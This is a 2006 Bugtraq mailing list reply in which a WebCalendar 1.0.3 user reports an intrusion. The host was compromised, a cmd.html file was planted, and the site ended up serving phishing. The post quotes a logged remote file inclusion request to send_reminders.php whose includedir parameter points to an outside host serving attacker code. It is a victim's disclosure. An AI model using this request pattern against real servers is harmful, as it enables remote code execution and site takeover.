'Re: WebCalendar-1.0.3 reading of any files'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: WebCalendar-1.0.3 reading of any files
From:       webcalendar () bouwmansgoed ! nl
Date:       2006-09-29 22:21:49
Message-ID: 20060929222149.4182.qmail () securityfocus ! com
[Download RAW message or body]

After finding these entries in the logfile and finding a cmd.html-file in this directory, I was disconnected because I was working as a phishing-site.

"POST /WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt? HTTP/1.1" 200 7315

In other words, the attacker has improved his actions. 

More files are available on request.
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic